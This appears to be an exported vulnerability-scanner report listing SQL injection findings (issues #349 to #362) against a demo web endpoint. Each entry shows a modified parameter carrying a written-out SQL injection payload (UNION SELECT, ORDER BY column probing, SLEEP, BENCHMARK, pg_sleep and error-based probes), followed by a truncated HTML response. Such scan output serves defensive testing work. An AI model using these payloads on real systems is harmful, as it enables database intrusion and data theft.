src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #349\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='S'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #350\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #351\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #352\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #353\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #354\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #355\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #356\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #357\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #358Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #359\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #360\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #361\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #362\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 